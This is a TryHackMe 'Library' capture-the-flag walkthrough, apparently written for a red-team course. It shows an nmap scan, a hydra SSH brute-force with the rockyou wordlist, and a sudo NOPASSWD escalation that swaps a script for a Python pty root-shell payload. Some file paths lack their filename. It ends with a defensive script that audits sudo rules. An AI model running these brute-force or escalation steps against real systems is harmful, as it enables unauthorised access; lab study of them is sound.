TryHackMe: Library room walkthrough

This write-up covers the steps taken to solve a beginner-level security challenge: finding the user.txt and root.txt flags for the Library room on the TryHackMe platform.

This blog was written as part of a task for the Masters Certification in Red Team Program from HackerU.

Step 1 : Connect to TryHackMe and start target machine.

  1. Download the OpenVPN configuration file from the TryHackMe platform.
  2. Connect to TryHackMe by running this command in a Kali terminal:

sudo openvpn /pathtoOVPNfile.ovpn

  3. Start the machine in the 'library' room; the target IP address will be displayed in a minute.

Step 2 : Information gathering using Nmap

  1. Start nmap scan of the target ip:

nmap -A -O <target ip>

nmap output

Step 3: Detailed Findings

Open ports:

22 : SSH

80 : http Apache httpd 2.4.18

  1. Navigating to robots.txt gives the hint “rockyou”.

2. Accessing open ports

Port 80: the username is displayed as the author.

Port 80

3. Since port 22 is open, try to brute-force the user's credentials using the username found above and the clue from robots.txt:

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt <target ip> ssh

Credentials found

4. Log in over SSH with the credentials found above; the login is successful.

ssh meliodas@<targetip>

5. Found user.txt

6. Check the user's sudo privileges:

sudo -l

Found privileges for /home/meliodas/

7. The file can be run with sudo NOPASSWD, and it sits under the user's own home directory, so remove it and create a new file in its place:

echo 'import pty;pty.spawn("/bin/sh")' > /home/meliodas/

8. Run the file with sudo permission; the user gets root access.

sudo python /home/meliodas/

9. Navigate to the root folder and find the root.txt file.
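
The escalation in steps 6 to 8 works because a NOPASSWD sudo rule names a script in a directory the unprivileged user controls. The following audit check is an added example, not part of the original write-up: it parses `sudo -l` output and flags every path component that a non-trusted user could modify or replace. The sample output, the user alice, the script name and both function names are constructed for illustration.

```python
import os
import re
import stat

# Constructed `sudo -l` output; user and script names are hypothetical.
SAMPLE_SUDO_L = """\
User alice may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/python* /home/alice/backup.py
    (root) PASSWD: /usr/bin/systemctl status
"""

def nopasswd_paths(sudo_l_output):
    """Absolute paths (commands and arguments) named in NOPASSWD rules."""
    paths = []
    for line in sudo_l_output.splitlines():
        match = re.search(r"NOPASSWD:\s*(.+)", line)
        if not match:
            continue
        for token in re.split(r"[,\s]+", match.group(1)):
            # Wildcard entries cannot be stat()ed directly; skipped here.
            if token.startswith("/") and not re.search(r"[*?\[]", token):
                paths.append(token)
    return paths

def weak_links(path, trusted_uids=frozenset({0}), stop_at="/"):
    """List (component, reason) pairs where an untrusted user could modify
    or replace `path`, checking the file and every directory up to stop_at."""
    findings = []
    current = os.path.realpath(path)
    stop_at = os.path.realpath(stop_at)
    while True:
        st = os.stat(current)
        if st.st_uid not in trusted_uids:
            findings.append((current, "owned by uid %d" % st.st_uid))
        elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            # A sticky directory stops users replacing entries they do not own.
            if not (stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX):
                findings.append((current, "group/world writable"))
        parent = os.path.dirname(current)
        if current == stop_at or parent == current:
            return findings
        current = parent

if __name__ == "__main__":
    for p in nopasswd_paths(SAMPLE_SUDO_L):
        if os.path.exists(p):
            print(p, weak_links(p))
```

Any finding on a path that sudo runs as root means the rule should point at a root-owned file in a root-owned directory instead.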

With these steps, I was able to answer the questions posted in the Library room on TryHackMe.

Thank you for reading this blog.